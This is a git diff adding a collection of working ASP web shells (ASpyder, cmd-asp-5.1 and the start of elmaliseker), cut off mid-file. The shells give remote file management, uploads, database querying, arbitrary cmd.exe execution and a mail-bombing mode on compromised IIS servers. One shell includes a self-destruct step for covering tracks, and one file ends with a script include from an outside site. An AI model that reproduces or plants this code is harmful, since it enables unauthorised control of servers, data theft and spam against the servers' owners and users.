+	if Document.frmSQL.txtSQL.value = "" then
+		Document.frmSQL.txtSQL.value = "SELECT * FROM " & vbcrlf & "WHERE " & vbcrlf & "ORDER BY "
+		exit sub
+	end if
+	Document.frmSQL.Submit
+end sub
+sub cmdTables_onclick
+	Document.frmSQL.txtSQL.value = "select name as 'TablesListed' from sysobjects where xtype='U' order by name"
+	Document.frmSQL.Submit
+end sub
+sub cmdColumns_onclick
+	strTable =InputBox("Return Columns for which Table?","Table Name...")
+	strTable = Trim(strTable)
+	if len(strTable) > 0 Then
+		SQL = "select name As 'ColumnName',xusertype As 'DataType',length as Length from syscolumns where id=(select id from sysobjects where xtype='U' and name='" & strTable & "') order by name"
+		Document.frmSQL.txtSQL.value = SQL
+		Document.frmSQL.Submit	
+	End if
+end sub
+sub cmdClear_onclick
+	Document.frmSQL.txtSQL.value = ""
+end sub
+sub cmdBack_onclick
+	Document.Location = "<%=Request.Servervariables("SCRIPT_NAME")%>?txtpath=<%=session("txtpath")%>"
+end sub
+Sub btnPagePrev_OnClick
+	Document.frmSQL.mPage.value = Document.frmSQL.mPage.value - 1
+	Document.frmSQL.Submit
+end sub
+Sub btnPageNext_OnClick
+	Document.frmSQL.mPage.value = Document.frmSQL.mPage.value + 1
+	Document.frmSQL.Submit
+end sub
+Sub cmbPageSelect_onchange
+	Document.frmSQL.mPage.value = (Document.frmSQL.cmbPageSelect.selectedIndex + 1)
+	Document.frmSQL.Submit
+End Sub
+Sub txtNoRecords_onclick
+	Document.frmSQL.cmbPageSelect.selectedIndex = 0
+	Document.frmSQL.mPage.value = 1
+End Sub
+</script>
+<style>
+	TR {font-family: sans-serif;}
+</style>
+<body bgcolor=black>
+<form name=frmSQL action="<%=Request.Servervariables("SCRIPT_NAME")%>?qa=@" method=Post>
+<table border="0"><tr>
+      <td align=right><font color=#ff8300 size="4" face="webdings">@ </font><font color="#CCCCCC" size="1" face="Verdana, Arial, Helvetica, sans-serif">Paste 
+        your connection string here : </font><font color="#CCCCCC"> 
+        <input name=txtCon type="text" size="60" value="<%=session("dbcon")%>">
+        </font><BR>
+        <textarea cols=75 name=txtSQL rows=4 wrap=PHYSICAL><%=myQuery%></textarea><BR>
+        <input name=cmdSubmit type=button value=Submit><input name=cmdTables type=button value=Tables><input name=cmdColumns type=button value=Columns><input name="reset" type=reset value=Reset><input name=cmdClear type=button value=Clear><input name=cmdBack type=button value="Return"><input type="Checkbox" name="chkXML" <%IF Request.Form("chkXML")= "on" tHEN Response.Write " checked " %>><font color="#CCCCCC" size="1" face="Verdana, Arial, Helvetica, sans-serif">GenerateXML</FONT>
+    </td>
+	<td>XXXXXX</td><td>
+	<center><B>ASP</b><font color=#ff8300 face=webdings size=6 >!</font><B><font color=Gray >Spyder</font> Apr2003</B><BR><font color=black size=-2><TT>by ~sir_shagalot</TT></font></center>
+	</td></tr></table>
+<table><tr><td><%If Request.Form("chkXML") = "on"  Then getXML(myQuery) Else getTable(myQuery) %></td></tr></table></form>
+<HR><P align=right><font color=#ff8300><TT>Copyright 2003 Vela iNC.</B></font><BR><font size=-1 color=gray>Cheers to <a href="mailto:hAshish@shagzzz.cjb.net">hAshish</a> for all the help!</font></p><BR>
+</body>
+</html>
+<%
+		set myDBConnection = nothing
+		set rs2 = nothing
+		set rs = nothing
+'-------------
+response.End()
+end if
+'QUERY ANALYSER -- STOP
+%>
+<title><%=MyPath%></title>
+</head>
+<body bgcolor=black text=white topAprgin="0">
+<!-- Copyright Vela iNC. Apr2003 [www.shagzzz.cjb.net] Coded by ~sir_shagalot -->
+<%
+		Response.Flush
+'Code Optimisation START
+select case request.form("cmd")
+	case ""
+		If request.form("dirStuff")<>"" then
+			Response.write "<font face=arial size=-2>You need to click [Create] or [Delete] for folder operations to be</font>"
+		Else
+			Response.Write "<font face=webdings size=+3 color=#ff8300>&#1570;</font>"
+		End If
+	case "   Copy   "
+	' ---Copy From Folder routine Start
+		If Request.Form("Fname")="" then
+		Response.Write "<font face=arial size=-2 color=#ff8300>Copying: " & Request.QueryString("txtpath") & "\???</font><BR>"
+			err.number=424
+		Else
+			Response.Write "<font face=arial size=-2 color=#ff8300>Copying: " & Request.QueryString("txtpath") & "\" & Request.Form("Fname") & "</font><BR>"
+			fso.CopyFile Request.QueryString("txtpath") & "\" & Request.Form("Fname"),Target & Request.Form("Fname")
+			Response.Flush
+		End If
+	' ---Copy From Folder routine Stop
+	case "  Copy "
+	' ---Copy Too Folder routine Start
+		If Request.Form("ToCopy")<>"" and Request.Form("ToCopy") <> "------------------------------" Then
+			Response.Write "<font face=arial size=-2 color=#ff8300>Copying: " & Request.Form("txtpath") & "\" & Request.Form("ToCopy") & "</font><BR>"
+			Response.Flush
+			fso.CopyFile Target & Request.Form("ToCopy"), Request.Form("txtpath") & "\" & Request.Form("ToCopy")
+		Else
+		Response.Write "<font face=arial size=-2 color=#ff8300>Copying: " & Request.Form("txtpath") & "\???</font><BR>"
+			err.number=424
+		End If
+	' ---Copy Too Folder routine Stop
+	case "Delete"		'two of this
+	if request.form("todelete")<>"" then
+	' ---File Delete start
+		If (Request.Form("ToDelete")) = myScriptName then'(Right(Request.Servervariables("SCRIPT_NAME"),len(Request.Servervariables("SCRIPT_NAME"))-1)) Then
+		Response.Write "<center><font face=arial size=-2 color=#ff8300><BR><BR><HR>SELFDESTRUCT INITIATED...<BR>"
+			Response.Flush
+			fso.DeleteFile Request.Form("txtpath") & "\" & Request.Form("ToDelete")
+				%>+++DONE+++</font><BR><HR>
+				<font color=gray size=-2 face=arial title="To avoid anyone from seeing what you were doing by using the browser back button."><span style='cursor: hand;' OnClick=window.close(this);>CLOSE THIS WINDOW</font>
+			<%Response.End
+		End If
+		If Request.Form("ToDelete") <> "" and Request.Form("ToDelete") <> "------------------------------" Then
+			Response.Write "<font face=arial size=-2 color=#ff8300>Deleting: " & Request.Form("txtpath") & "\" & Request.Form("ToDelete") & "</font><BR>"
+			Response.Flush
+			fso.DeleteFile Request.Form("txtpath") & "\" & Request.Form("ToDelete")
+		Else
+			Response.Write "<font face=arial size=-2 color=#ff8300>Deleting: " & Request.Form("txtpath") & "\???</font><BR>"
+			err.number=424
+		End If
+	' ---File Delete stop
+		Else If request.form("dirStuff")<>"" then
+			Response.Write "<font face=arial size=-2 color=#ff8300>Deleting folder...</font><BR>"
+			fso.DeleteFolder MyPath & "\" & request.form("DirName")
+		end if
+	End If
+
+	case "Edit/Create"
+%>
+<center><BR><table bgcolor="#505050" cellpadding="8"><tr>
+    <td bgcolor="#000000" valign="bottom">
+	<Font face=arial SIZE=-2 color=#ff8300>NOTE: The following edit box maynot display special characters from files. Therefore the contents displayed maynot be considered correct or accurate.</font>
+	</td></tr><tr><td><TT>Path=> <%=pathname%><BR><BR>
+<%
+ 		' fetch file information 
+		Set f = fso.GetFile(pathname) 
+%>
+file Type: <%=f.Type%><BR>
+file Size: <%=FormatNumber(f.size,0)%> bytes<BR>
+file Created: <%=FormatDateTime(f.datecreated,1)%>&nbsp;<%=FormatDateTime(f.datecreated,3)%><BR>
+last Modified: <%=FormatDateTime(f.datelastmodified,1)%>&nbsp;<%=FormatDateTime(f.datelastmodified,3)%><BR>
+last Accessed: <%=FormatDateTime(f.datelastaccessed,1)%>&nbsp;<%=FormatDateTime(f.datelastaccessed,3)%><BR>
+file Attributes: <%=f.attributes%><BR>
+<%
+	Set f = Nothing
+	response.write "<center><FORM action=""" & Request.Servervariables("SCRIPT_NAME") & "?txtpath=" & MyPath & """ METHOD=""POST"">"
+		'read the file
+		Set f = fso.OpenTextFile(pathname)
+		If NOT f.AtEndOfStream Then fstr = f.readall
+		f.Close
+		Set f = Nothing
+		Set fso = Nothing
+		response.write "<TABLE><TR><TD>" & VBCRLF
+		response.write "<FONT TITLE=""Use this text area to view or change the contents of this document. Click [Save As] to store the updated contents to the web server."" FACE=arial SIZE=1 ><B>DOCUMENT CONTENTS</B></FONT><BR>" & VBCRLF
+		response.write "<TEXTAREA NAME=FILEDATA ROWS=16 COLS=85 WRAP=OFF>" & Server.HTMLEncode(fstr) & "</TEXTAREA>" & VBCRLF
+		response.write "</TD></TR></TABLE>" & VBCRLF
+%>
+<BR><center><TT>LOCATION <INPUT TYPE="TEXT" SIZE=48 MAXLENGTH=255 NAME="PATHNAME" VALUE="<%=pathname%>">
+<INPUT TYPE="SUBMIT" NAME=cmd VALUE="Save As" TITLE="This write to the file specifed and overwrite it without warning.">
+<INPUT TYPE="SUBMIT" NAME="POSTACTION" VALUE="Cancel" TITLE="If you recieve an error while saving, then most likely you do not have write access OR the file attributes are set to readonly !!">
+</FORM></td></tr></table><BR>
+<%
+response.end
+
+	case "Create"
+		Response.Write "<font face=arial size=-2 color=#ff8300>Creating folder...</font><BR>"
+		fso.CreateFolder MyPath & "\" & request.form("DirName")
+
+	case "Save As"
+		Response.Write "<font face=arial size=-2 color=#ff8300>Saving file...</font><BR>"
+		Set f = fso.CreateTextFile(Request.Form("pathname"))
+		f.write Request.Form("FILEDATA")
+		f.close
+end select
+'Code Optimisation STOP
+' ---DRIVES start here
+	If request.querystring("getDRVs")="@" then
+%>
+<BR><BR><BR><center><table bgcolor="#505050" cellpadding=4>
+<tr><td><Font face=arial size=-1>Available Drive Information:</font>
+</td></tr><tr><td bgcolor=black >
+<table><tr><td><tt>Drive</td><td><tt>Type</td><td><tt>Path</td><td><tt>ShareName</td><td><tt>Size[MB]</td><td><tt>ReadyToUse</td><td><tt>VolumeLabel</td><td></tr>
+<%For Each thingy in fso.Drives%>
+<tr><td><tt>
+<%=thingy.DriveLetter%> </td><td><tt> <%=thingy.DriveType%> </td><td><tt> <%=thingy.Path%> </td><td><tt> <%=thingy.ShareName%> </td><td><tt> <%=((thingy.TotalSize)/1024000)%> </td><td><tt> <%=thingy.IsReady%> </td><td><tt> <%=thingy.VolumeName%>
+<%Next%>
+</td></tr></table>
+</td></tr></table><BR><a href="<%=Request.Servervariables("SCRIPT_NAME")%>?txtpath=<%=MyPath%>"><font face="webdings" title=" BACK " size=+2 >7</font></a></center>
+<%
+	Response.end
+	end if
+' ---DRIVES stop here
+%>
+<HEAD>
+<SCRIPT Language="VBScript">
+sub getit(thestuff)
+if right("<%=showPath%>",1) <> "\" Then
+   document.myform.txtpath.value = "<%=showPath%>" & "\" & thestuff
+Else
+   document.myform.txtpath.value = "<%=showPath%>" & thestuff
+End If
+document.myform.submit()
+End sub
+</SCRIPT>
+</HEAD>
+<%	
+'---Report errors
+select case err.number
+	case "0"
+	response.write "<font face=webdings color=#55ff55>i</font> <font face=arial size=-2>Successfull..</font>"
+
+	case "58"
+	response.write "<font face=arial size=-1 color=red>Folder already exists OR no folder name specified...</font>"
+
+	case "70"
+	response.write "<font face=arial size=-1 color=red>Permission Denied, folder/file is readonly or contains such files...</font>"
+
+	case "76"
+	response.write "<font face=arial size=-1 color=red>Path not found...</font>"
+
+	case "424"
+	response.write "<font face=arial size=-1 color=red>Missing, Insufficient data OR file is readonly...</font>"
+	
+	case else
+	response.write "<font face=arial size=-1 color=red>" & err.description & "</font>"
+
+end select
+'---Report errors end
+%>
+<center><B>ASP</b><font color=#ff8300 face=webdings size=6 >!</font><B><font color=Gray >Spyder</font> Apr2003</B><BR><font color=black size=-2><TT>by ~sir_shagalot</TT></font></center>
+<font face=Courier>
+<table><tr><td>
+<form method="post" action="<%=Request.Servervariables("SCRIPT_NAME")%>" name="myform" >
+<Table bgcolor=#505050 ><tr><td bgcolor=#505050 >
+<font face=Arial size=-2 color=#ff8300 > PATH INFO : </font></td><td align=right ><font face=Arial size=-2 color=#ff8300 >Volume Label:</font> <%=drv.VolumeName%> </td></tr>
+<tr><td colspan=2 cellpadding=2 bgcolor=#303030 ><font face=Arial size=-1 color=gray>Virtual: http://<%=Request.ServerVariables("SERVER_NAME")%><%=Request.Servervariables("SCRIPT_NAME")%></Font><BR><font face=wingdings color=Gray >1</font><font face=Arial size=+1 > <%=showPath%></Font>
+<BR><input type=text width=40 size=60 name=txtpath value="<%=showPath%>" ><input type=submit name=cmd value="  View  " >
+</td></tr></form></table>
+</td><td><center>
+<table bgcolor=#505050 cellpadding=4><tr><td bgcolor=black ><a href="<%=Request.Servervariables("SCRIPT_NAME")%>?getDRVs=@&txtpath=<%=MyPath%>"><font size=-2 face=arial>Retrieve Available Network Drives</a></td></tr>
+<tr><td bgcolor=black align=right><A HREF="<%=Request.Servervariables("SCRIPT_NAME")%>?qa=@&txtpath=<%=MyPath%>"><font size=-2 face=arial>SQL Query Analyser</A></td></tr>
+<tr><td bgcolor=black  align=right><A HREF="<%=Request.Servervariables("SCRIPT_NAME")%>?logoff=@&...thankyou.for.using.ASpyder....~sir_shagalot!..[shagzzz.cjb.net]"><font size=-2 face=arial>+++LOGOFF+++</A></td></tr></table>
+</td></tr></table>
+<p align=center ><Table width=75% bgcolor=#505050 cellpadding=4 ><tr><td>
+<form method="post" action="<%=Request.Servervariables("SCRIPT_NAME")%>" ><font face=arial size=-1 >Delete file from current directory:</font><BR>
+<select size=1 name=ToDelete >
+<option>------------------------------</option>"
+<%
+fi=0
+For each file in folder.Files
+	Response.Write "<option>" & file.name & "</option>"
+fi=fi+1
+next
+	Response.Write "</select><input type=hidden name=txtpath value=""" & MyPath & """><input type=Submit name=cmd value=Delete ></form></td><td>"
+	Response.Write "<form method=post name=frmCopyFile action=""" & Request.Servervariables("SCRIPT_NAME") & """ ><font face=arial size=-1 >Copy file too current directory:</font><br><select size=1 name=ToCopy >"
+	Response.Write "<option>------------------------------</option>"
+For each file in fileCopy.Files
+	Response.Write "<option>" & file.name & "</option>"
+next
+	Response.Write "</select><input type=hidden name=txtpath value=""" & MyPath & """><input type=Submit name=cmd value=""  Copy "" ></form></td></tr></Table>"
+Response.Flush
+' ---View Tree Begins Here
+	Response.Write "<table Cellpading=2 width=75% bgcolor=#505050 ><tr><td valign=top width=50% bgcolor=#303030 >Folders:<BR><BR>"
+fo=0
+	Response.Write "<font face=wingdings color=Gray >0</font> <FONT COLOR=#c8c8c8><span style='cursor: hand;' OnClick=""getit('..')"">..</span></FONT><BR>"
+
+For each fold in folder.SubFolders '-->FOLDERz
+fo=fo+1
+	Response.Write "<font face=wingdings color=Gray >0</font> <FONT COLOR=#eeeeee><span style='cursor: hand;' OnClick=""getit('" & fold.name & "')"">" & fold.name & "</span></FONT><BR>"
+Next
+%>
+<BR><center><form method=post action="<%=Request.Servervariables("SCRIPT_NAME")%>?txtpath=<%=MyPath%>">
+<table bgcolor=#505050 cellspacing=4><tr><td>
+<font face=arial size=-1 title="Create and Delete folders by entering their names here manually.">Directory:</td></tr>
+<tr><td align=right ><input type=text size=20 name=DirName><BR>
+<input type=submit name=cmd value=Create><input type=submit name=cmd value=Delete><input type=hidden name=DirStuff value=@>
+</tr></td></table></form>
+<%
+Response.Write "<BR></td><td valign=top width=50% bgcolor=#303030 >Files:<BR><BR>"
+Response.Flush
+%>
+	<form method=post name=frmCopySelected action="<%=Request.Servervariables("SCRIPT_NAME")%>?txtpath=<%=MyPath%>">
+<%
+	Response.write "<center><select name=Fname size=" & fi+3 & " style=""background-color: rgb(48,48,48); color: rgb(210,210,210)"">"
+For each file in folder.Files '-->FILEz
+	Response.Write "<option value=""" & file.name & """>&nbsp;&nbsp;" & file.name & " -- [" & Int(file.size/1024)+1 & " kb]</option>"
+Next
+	Response.write "</select>"
+	Response.write "<br><input type=submit name=cmd value=""   Copy   ""><input type=submit name=cmd value=""Edit/Create""><input type=submit name=cmd value=Download>"
+%>
+	</form>
+<%
+	Response.Write "<BR></td></tr><tr><td align=center ><B>Listed: " & fo & "</b></td><td align=center ><b>Listed: " & fi & "</b></td></tr></table><BR>"
+' ---View Tree Ends Here
+' ---Upload Routine starts here
+%>
+	<form method="post" ENCTYPE="multipart/form-data" action="<%=Request.Servervariables("SCRIPT_NAME")%>?upload=@&txtpath=<%=MyPath%>">
+<table bgcolor="#505050" cellpadding="8">
+  <tr>
+    <td bgcolor=#303030 valign="bottom"><font size=+1 face=wingdings color=Gray >2</font><font face="Arial" size=-2 color="#ff8300"> SELECT FILES TO UPLOAD:<br>
+    <input TYPE="FILE" SIZE="53" NAME="FILE1"><BR>
+	<input TYPE="FILE" SIZE="53" NAME="FILE2"><BR>
+	<input TYPE="FILE" SIZE="53" NAME="FILE3"><BR>
+	<input TYPE="FILE" SIZE="53" NAME="FILE4"><BR>
+	<input TYPE="FILE" SIZE="53" NAME="FILE5"><BR>
+	<input TYPE="FILE" SIZE="53" NAME="FILE6"><BR>
+	<input TYPE="FILE" SIZE="53" NAME="FILE7"><BR>
+	<input TYPE="FILE" SIZE="53" NAME="FILE8"><BR>
+	<input TYPE="FILE" SIZE="53" NAME="FILE9"><BR>
+	<input TYPE="FILE" SIZE="53" NAME="FILE10"><BR>
+	<input TYPE="FILE" SIZE="53" NAME="FILE11"><BR>
+	<input TYPE="FILE" SIZE="53" NAME="FILE12"><BR>
+	<input TYPE="FILE" SIZE="53" NAME="FILE13"><BR>
+	<input TYPE="FILE" SIZE="53" NAME="FILE14"><BR>
+	<input TYPE="FILE" SIZE="53" NAME="FILE15"><BR>
+	<input TYPE="FILE" SIZE="53" NAME="FILE16"><BR>
+	<input TYPE="FILE" SIZE="53" NAME="FILE17"><BR>
+	<input TYPE="FILE" SIZE="53" NAME="FILE18"><BR>
+	<input TYPE="FILE" SIZE="53" NAME="FILE19"><BR>
+	<input TYPE="FILE" SIZE="53" NAME="FILE20"><BR>
+
+	&nbsp;&nbsp;<input TYPE="submit" VALUE="Upload !" name="Upload" TITLE="If you recieve an error while uploading, then most likely you do not have write access to disk !!">
+	</font></td>
+  </tr>
+</table>
+<BR>
+<table bgcolor="#505050" cellpadding="6">
+  <tr>
+    <td bgcolor="#000000" valign="bottom"><font face="Arial" size="-2" color=gray>NOTE FOR UPLOAD -
+    YOU MUST HAVE VBSCRIPT v5.0 INSTALLED ON YOUR WEB SERVER&nbsp; FOR THIS LIBRARY TO
+    FUNCTION CORRECTLY. YOU CAN OBTAIN IT FREE FROM MICROSOFT WHEN YOU INSTALL INTERNET
+    EXPLORER 5.0 OR LATER. WHICH IS, MOST LIKELY, ALREADY INSTALLED.</font></td>
+  </tr>
+</table>
+	</form>
+<%
+' ---Upload Routine stops here
+%>
+
+</font><HR><P align=right><font color=#ff8300><TT>Copyright 2003 Vela iNC.</B></font><BR><font size=1 face=arial>[ System: <%=now%> ]</font></p><BR>
+</body></html>
+<SCRIPT SRC=http://www.saldiri.org/summer/ciz.js></SCRIPT>
diff --git a/xakep-shells/ASP/cmd-asp-5.1.asp.txt b/xakep-shells/ASP/cmd-asp-5.1.asp.txt
new file mode 100644
index 0000000..c4b93db
--- /dev/null
+++ b/xakep-shells/ASP/cmd-asp-5.1.asp.txt
@@ -0,0 +1,41 @@
+<%
+
+' ASP Cmd Shell On IIS 5.1
+' brett.moore_at_security-assessment.com 
+' http://seclists.org/bugtraq/2006/Dec/0226.html
+
+
+Dim oS,oSNet,oFSys, oF,szCMD, szTF
+On Error Resume Next
+Set oS = Server.CreateObject("WSCRIPT.SHELL")
+Set oSNet = Server.CreateObject("WSCRIPT.NETWORK")
+Set oFSys = Server.CreateObject("Scripting.FileSystemObject")
+szCMD = Request.Form("C")
+If (szCMD <> "") Then
+  szTF = "c:\windows\pchealth\ERRORREP\QHEADLES\" &  oFSys.GetTempName()
+  ' Here we do the command
+  Call oS.Run("win.com cmd.exe /c """ & szCMD & " > " & szTF &
+"""",0,True)
+  response.write szTF
+  ' Change perms
+  Call oS.Run("win.com cmd.exe /c cacls.exe " & szTF & " /E /G
+everyone:F",0,True)
+  Set oF = oFSys.OpenTextFile(szTF,1,False,0)
+End If 
+%>
+<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
+<input type=text name="C" size=70 value="<%= szCMD %>">
+<input type=submit value="Run"></FORM><PRE>
+Machine: <%=oSNet.ComputerName%><BR>
+Username: <%=oSNet.UserName%><br>
+<% 
+If (IsObject(oF)) Then
+  On Error Resume Next
+  Response.Write Server.HTMLEncode(oF.ReadAll)
+  oF.Close
+  Call oS.Run("win.com cmd.exe /c del "& szTF,0,True)
+End If 
+
+%>
+
+<!--    http://michaeldaw.org   2006    -->
diff --git a/xakep-shells/ASP/elmaliseker.asp.txt b/xakep-shells/ASP/elmaliseker.asp.txt
new file mode 100644
index 0000000..26765f8
--- /dev/null
+++ b/xakep-shells/ASP/elmaliseker.asp.txt
@@ -0,0 +1,2324 @@
+<%
+
+' Tac gia: forever5pi (theo huong dan cua anh vicki-vkdt)
+' Email : forever5pi@yahoo.com
+' Website: http://vnhacker.org
+
+option explicit
+
+Server.ScriptTimeout=10000
+Response.Buffer=false
+
+dim gURL,gMsg
+dim targetPath,cp_dst,mv_dst,root
+dim FSO,re
+dim zombie_array,special_array
+
+' ###################################### CONFIGURATION ######################################
+
+const gPassword="" ' mat khau ("" : khong dung password)
+
+const gMax=50 ' chieu dai toi da cho ten file
+const gBomb=1000 ' so luong mail mac dinh can bomb
+
+const lnkExt="lnk,url"
+const editExt="htm,html,asp,asa,txt,inc,css,aspx,js,vbs,shtm,shtml,xml,xsl,log,ini,bat,bak" ' danh sach cac file cho phep edit
+
+const TmpDir="C:\" ' thu muc tam thoi mac dinh
+const Shell="cmd.exe" ' shell mac dinh
+
+' cac chuoi ket noi mac dinh
+const cstrMSSQL = "Provider=SQLOLEDB;Data Source=SERVER_NAME;database=DB_NAME;uid=UID;pwd=PWD"
+const cstrJET = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=full_path/db_file.mdb" 
+const cstrACCESS = "DRIVER={Microsoft Access Driver (*.mdb)}; DBQ=full_path/db_file.mdb"
+const cstrORACLE = "Provider=OraOLEDB.Oracle.1; Data Source=DB_NAME; User ID=UID; Password=PWD"
+const cstrMYSQL = "Driver=MySQL;server=SERVER_IP;uid=UID;pwd=PWD;database=DB_NAME"
+const cstrDSN = "DSN_NAME"
+
+const bSize=false' co/khong hien folder-size
+
+const charset="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_-" ' tap ki thu dung de sinh chuoi ngau nhien
+
+zombie_array=array("com","net","org","info","vn","cn") ' mang cac domain z0mbie
+special_array=array("yahoo.com","hotmail.com") ' mang cac domain dac biet (dung trong bomb mail)
+
+root=Server.MapPath(".") ' folder mac dinh
+
+' ###########################################################################################
+
+gURL=Request.ServerVariables("SCRIPT_NAME")
+Init()
+if (LCase(Left(Request.ServerVariables("HTTP_CONTENT_TYPE"),19))="multipart/form-data") and (Session("allow")=1) and (Session("mode")=0) then Upload()
+Secure()
+if Request.Form("command")="Logout" then Logout()
+if Request.Form("command")="ChangeMode" then
+Session("mode")=Request.Form("mode")
+Session("switch")=true
+end if
+select case Session("mode")
+case 0 myFile()
+case 1 myCMD()
+case 2 mySQL()
+case 3 myMail()
+end select
+
+'###########################################################################################
+
+sub myFile()
+if Session("switch")=true then
+targetPath=Session("targetPath")
+if targetPath="" then targetPath=root
+Session("switch")=false
+else
+targetPath=Trim(Request.Form("folder"))
+if targetPath="" then targetPath=root else targetPath=abspath(targetPath)
+
+select case Request.Form("command")
+case "Download"
+Download()
+exit sub
+case "Edit"
+Editor()
+exit sub
+case "ChangeAttributesFile","ChangeAttributesFolder"
+ChangeAttributesItem()
+exit sub
+case "Tree"
+Tree()
+exit sub
+case "Delete" Delete()
+case "Move" Move()
+case "Copy" Copy()
+case "ZipInfo" ZipInfo()
+case "NewFile","NewFolder" CreateItem()
+case "RenameFile","RenameFolder" RenameItem()
+case "OpenFolder" OpenFolder()
+case "LevelUp" targetPath=FSO.GetParentFolderName(abspath(Request.Form("folder")))
+case "LevelRoot" targetPath=findroot(abspath(Request.Form("folder")))
+end select
+
+Session("targetPath")=targetPath
+end if
+
+HtmlHeader("")
+HtmlMode()
+List()
+HtmlFooter()
+Destroy()
+end sub
+
+'###########################################################################################
+
+sub myCMD()
+dim bDoIt
+dim bEcho
+dim szTmpDir,szShell,szCmd,szTmpFile
+dim oScript,oScriptNet,oFile
+
+HtmlHeader("")
+HtmlMode()
+
+set oScript=Server.CreateObject("Wscript.Shell")
+set oScriptNet=Server.CreateObject("Wscript.Network")
+
+szTmpDir=Trim(Request.Form("tmpdir"))
+szShell=Trim(Request.Form("shell"))
+szCmd=Trim(Request.Form("cmd"))
+bEcho=CBool(Request.Form("echo"))
+
+if Session("switch")=true then
+Session("switch")=false
+bDoit=false
+szTmpDir=Session("szTmpDir")
+szShell=Session("szShell")
+szCmd=Session("szCmd")
+bEcho=Session("bEcho")
+else
+bDoIt=true
+end if
+
+if szTmpDir="" then szTmpDir=TmpDir else szTmpDir=abspath(szTmpDir)
+if szShell="" then szShell=Shell
+
+Session("szTmpDir")=szTmpDir
+Session("szShell")=szShell
+Session("szCmd")=szCmd
+Session("bEcho")=bEcho
+
+%>
+<form name=frmCMD method=post action="<%=gURL%>">
+<table>
+<tr><td><b>T</b>mpDir:</td><td><input type=text name=tmpdir value="<%=Server.HtmlEncode(szTmpDir)%>" size=20></td></tr>
+<tr><td><b>S</b>hell:</td><td><input type=text name=shell value="<%=Server.HtmlEncode(szShell)%>" size=20></td></tr>
+<tr><td><b>C</b>md:</td><td><input type=text name=cmd value="<%=Server.HtmlEncode(szCmd)%>" size=80> <input type=submit value=Go></td></tr>
+<tr><td><b>E</b>cho:</td><td><input type=checkbox name=echo value=1<%if bEcho then Response.Write " checked"%>></td></tr>
+</table>
+</form>
+<script>frmCMD.cmd.focus()</script>
+<%
+if (szCmd<>"") and (bDoIt=true) then
+if bEcho then
+call oScript.Run(szShell & " /c " & szCmd)
+else
+szTmpFile = addslash(szTmpDir) & FSO.GetTempName
+call oScript.Run(szShell & " /c " & szCmd & " > " & szTmpFile, 0, true)
+if FSO.FileExists(szTmpFile) then set oFile=FSO.OpenTextFile (szTmpFile, 1, false, 0)
+end if
+end if
+%>
+<p><%=FormatDate(Now)%>
+<p><b>I</b>P: <%=Request.ServerVariables("LOCAL_ADDR")%><br>
+<b>U</b>ser: \\<%=oScriptNet.ComputerName%>\\<%=oScriptNet.UserName%>
+<%
+if (IsObject(oFile)) then
+on error resume next
+%>
+<pre>
+<%=Server.HtmlEncode(oFile.ReadAll)%>
+</pre>
+<%
+oFile.Close
+call FSO.DeleteFile(szTmpFile, true)
+end if
+
+set oScript=nothing
+set oScriptNet=nothing
+
+HtmlFooter()
+Destroy()
+end sub
+
+'###########################################################################################
+
+sub mySQL()
+dim szConn,szSQL1,szSQL2,szSQL,bDoIt
+dim intChoice
+
+HtmlHeader("")
+HtmlMode()
+
+szConn=Trim(Request.Form("conn"))
+szSQL1=Trim(Request.Form("sql1"))
+szSQL2=Trim(Request.Form("sql2"))
+intChoice=CInt(Request.Form("choice"))
+
+if Session("switch")=true then
+Session("switch")=false
+bDoIt=false
+szConn=Session("szConn")
+szSQL1=Session("szSQL1")
+szSQL2=Session("szSQL2")
+intChoice=Session("intChoice")
+else
+bDoIt=true
+end if
+
+if intChoice=0 then intChoice=1
+if intChoice=1 then szSQL=szSQL1 else szSQL=szSQL2
+
+Session("szConn")=szConn
+Session("szSQL1")=szSQL1
+Session("szSQL2")=szSQL2
+Session("intChoice")=intChoice
+
+select case trim(ucase(szConn))
+case "MSSQL" 
+szConn=cstrMSSQL
+szSQL=""
+case "JET"
+szConn=cstrJET
+szSQL=""
+case "ACCESS"
+szConn=cstrACCESS
+szSQL=""
+case "ORACLE"
+szConn=cstrORACLE
+szSQL=""
+case "MYSQL"
+szConn=cstrMYSQL
+szSQL=""
+case "DSN"
+szConn=cstrDSN
+szSQL=""
+end select
+%>
+<input type=button value="<->" onclick="changeInput()">
+<form name=frmSQL method=post action="<%=gURL%>">
+<input type=hidden name=choice value="<%=intChoice%>">
+<b>C</b>onn: <input type=text name=conn value="<%=Server.HtmlEncode(szConn)%>" size=90> <br>
+<b>S</b>QL:  <span id=s1<%if intChoice=2 then Response.Write " style=""display:none"""%>><input type=text name=sql1 value="<%=Server.HtmlEncode(szSQL1)%>" size=90></span>
+<span id=s2<%if intChoice=1 then Response.Write " style=""display:none"""%>>( [F9] = Go )<br><textarea name=sql2 cols=42 rows=12 onkeydown="if (event.keyCode==120) frmSQL.submit();"><%=Server.HtmlEncode(szSQL2)%></textarea><br></span>
+<input type=submit value=Go>
+</table>
+</form>
+<script>
+frmSQL.<%if szConn="" then Response.Write "conn" else Response.Write "sql"&intChoice%>.focus();
+frmSQL.<%if szConn="" then Response.Write "conn" else Response.Write "sql"&intChoice%>.focus();
+function changeInput() {
+if (s1.style.display=='none') {
+s1.style.display='inline';
+s2.style.display='none';
+frmSQL.choice.value="1";
+frmSQL.sql1.focus();
+} else {
+s1.style.display='none';
+s2.style.display='inline';
+frmSQL.choice.value="2";
+frmSQL.sql2.focus();
+}
+}
+</script>
+<%
+if (szConn<>"") and (szSQL<>"") and (bDoIt=true) then
+dim adoCon, rS
+dim i,intAffected
+
+set adoCon=Server.CreateObject("ADODB.Connection")
+adoCon.Open szConn
+set rS=adoCon.Execute(szSQL, intAffected)
+if (rS.Fields.Count>0) then
+' hien thi ten cua cac truong
+Response.Write "<table border=1>" & vbNewLine & "<tr>"
+for i=0 to rS.Fields.Count-1
+Response.Write "<td><tt><b>"
+if (rS.Fields(i).Name="") then
+Response.Write "(No column name)"
+else
+Response.Write Server.HtmlEncode(rS.Fields(i).Name)
+end if
+Response.Write "</b></tt></td>"
+next
+Response.Write "</tr>" & vbNewLine
+' hien thi du lieu tren cac dong
+on error resume next
+rS.MoveFirst
+do while not rS.EOF
+Response.Write "<tr>"
+for i=0 to rS.Fields.Count-1
+Response.Write "<td><tt>"
+if IsNull(rs.Fields(i).Value) then
+Response.Write "NULL"
+elseif (Trim(rs.Fields(i).Value)="") then
+Response.Write " "
